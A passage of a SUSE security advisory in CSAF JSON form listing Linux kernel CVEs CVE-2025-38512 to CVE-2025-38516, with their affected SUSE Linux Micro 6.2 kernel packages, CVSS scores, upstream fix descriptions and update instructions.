"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Micro 6.2:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Micro 6.2:kernel-rt-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-rt-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-rt-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-rt-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-rt-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-source-6.12.0-160000.26.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-38512",
"url": "https://www.suse.com/security/cve/CVE-2025-38512"
},
{
"category": "external",
"summary": "SUSE Bug 1248178 for CVE-2025-38512",
"url": "https://bugzilla.suse.com/1248178"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.2:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Micro 6.2:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Micro 6.2:kernel-rt-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-rt-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-rt-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-rt-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-rt-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-source-6.12.0-160000.26.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 6.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:A/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.2:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Micro 6.2:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Micro 6.2:kernel-rt-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-rt-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-rt-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-rt-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-rt-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-source-6.12.0-160000.26.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-27T11:51:02Z",
"details": "moderate"
}
],
"title": "CVE-2025-38512"
},
{
"cve": "CVE-2025-38513",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-38513"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nwifi: zd1211rw: Fix potential NULL pointer dereference in zd_mac_tx_to_dev()\n\nThere is a potential NULL pointer dereference in zd_mac_tx_to_dev(). For\nexample, the following is possible:\n\n \tT0\t\t\t \t\tT1\nzd_mac_tx_to_dev()\n /* len == skb_queue_len(q) */\n while (len \u003e ZD_MAC_MAX_ACK_WAITERS) {\n\n\t\t\t\t\t filter_ack()\n\t\t\t\t\t spin_lock_irqsave(\u0026q-\u003elock, flags);\n\t\t\t\t\t /* position == skb_queue_len(q) */\n\t\t\t\t\t for (i=1; i\u003cposition; i++)\n\t\t\t\t \t skb = __skb_dequeue(q)\n\n\t\t\t\t\t if (mac-\u003etype == NL80211_IFTYPE_AP)\n\t\t\t\t\t skb = __skb_dequeue(q);\n\t\t\t\t\t spin_unlock_irqrestore(\u0026q-\u003elock, flags);\n\n skb_dequeue() -\u003e NULL\n\nSince there is a small gap between checking skb queue length and skb being\nunconditionally dequeued in zd_mac_tx_to_dev(), skb_dequeue() can return NULL.\nThen the pointer is passed to zd_mac_tx_status() where it is dereferenced.\n\nIn order to avoid potential NULL pointer dereference due to situations like\nabove, check if skb is not NULL before passing it to zd_mac_tx_status().\n\nFound by Linux Verification Center (linuxtesting.org) with SVACE.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.2:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Micro 6.2:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Micro 6.2:kernel-rt-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-rt-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-rt-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-rt-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-rt-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-source-6.12.0-160000.26.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-38513",
"url": "https://www.suse.com/security/cve/CVE-2025-38513"
},
{
"category": "external",
"summary": "SUSE Bug 1248179 for CVE-2025-38513",
"url": "https://bugzilla.suse.com/1248179"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.2:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Micro 6.2:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Micro 6.2:kernel-rt-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-rt-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-rt-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-rt-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-rt-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-source-6.12.0-160000.26.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 4.7,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.2:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Micro 6.2:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Micro 6.2:kernel-rt-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-rt-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-rt-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-rt-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-rt-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-source-6.12.0-160000.26.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-27T11:51:02Z",
"details": "moderate"
}
],
"title": "CVE-2025-38513"
},
{
"cve": "CVE-2025-38515",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-38515"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\ndrm/sched: Increment job count before swapping tail spsc queue\n\nA small race exists between spsc_queue_push and the run-job worker, in\nwhich spsc_queue_push may return not-first while the run-job worker has\nalready idled due to the job count being zero. If this race occurs, job\nscheduling stops, leading to hangs while waiting on the job\u0027s DMA\nfences.\n\nSeal this race by incrementing the job count before appending to the\nSPSC queue.\n\nThis race was observed on a drm-tip 6.16-rc1 build with the Xe driver in\nan SVM test case.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.2:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Micro 6.2:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Micro 6.2:kernel-rt-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-rt-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-rt-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-rt-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-rt-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-source-6.12.0-160000.26.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-38515",
"url": "https://www.suse.com/security/cve/CVE-2025-38515"
},
{
"category": "external",
"summary": "SUSE Bug 1248212 for CVE-2025-38515",
"url": "https://bugzilla.suse.com/1248212"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.2:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Micro 6.2:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Micro 6.2:kernel-rt-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-rt-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-rt-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-rt-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-rt-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-source-6.12.0-160000.26.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 4.7,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.2:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Micro 6.2:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Micro 6.2:kernel-rt-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-rt-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-rt-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-rt-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-rt-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-source-6.12.0-160000.26.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-27T11:51:02Z",
"details": "moderate"
}
],
"title": "CVE-2025-38515"
},
{
"cve": "CVE-2025-38516",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-38516"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\npinctrl: qcom: msm: mark certain pins as invalid for interrupts\n\nOn some platforms, the UFS-reset pin has no interrupt logic in TLMM but\nis nevertheless registered as a GPIO in the kernel. This enables the\nuser-space to trigger a BUG() in the pinctrl-msm driver by running, for\nexample: `gpiomon -c 0 113` on RB2.\n\nThe exact culprit is requesting pins whose intr_detection_width setting\nis not 1 or 2 for interrupts. This hits a BUG() in\nmsm_gpio_irq_set_type(). Potentially crashing the kernel due to an\ninvalid request from user-space is not optimal, so let\u0027s go through the\npins and mark those that would fail the check as invalid for the irq chip\nas we should not even register them as available irqs.\n\nThis function can be extended if we determine that there are more\ncorner-cases like this.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.2:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Micro 6.2:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Micro 6.2:kernel-rt-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-rt-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-rt-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-rt-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-rt-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-source-6.12.0-160000.26.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-38516",
"url": "https://www.suse.com/security/cve/CVE-2025-38516"
},
{
"category": "external",
"summary": "SUSE Bug 1248209 for CVE-2025-38516",
